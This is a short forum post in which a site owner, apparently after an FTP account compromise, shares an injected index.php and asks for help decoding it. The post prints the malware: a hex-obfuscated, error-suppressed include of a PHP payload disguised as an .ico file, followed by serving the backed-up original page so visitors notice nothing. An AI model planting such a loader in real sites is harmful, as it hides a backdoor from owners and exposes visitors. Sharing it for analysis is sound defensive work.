So I found the below piece of code in my webhost account, it was smart enough to overwrite my default index.html and replaced it with index.php containing the below code which got executed each time someone hit the website without showing any signs of hacks to the end user.
Turns out my ftp username was compromised so thats how it found its way however I trying to decode and make sense of what exactly it does.
any takers ?
<?php
/*ade56*/
@include "\x2fhome\x2feddy\x77ebs/\x65ddyw\x65bs.c\x6fm/pa\x73swor\x64-gen\x65rato\x72/css\x2f.d40\x64f8b5\x2eico";
/*ade56*/
echo @file_get_contents('index.html.bak.bak');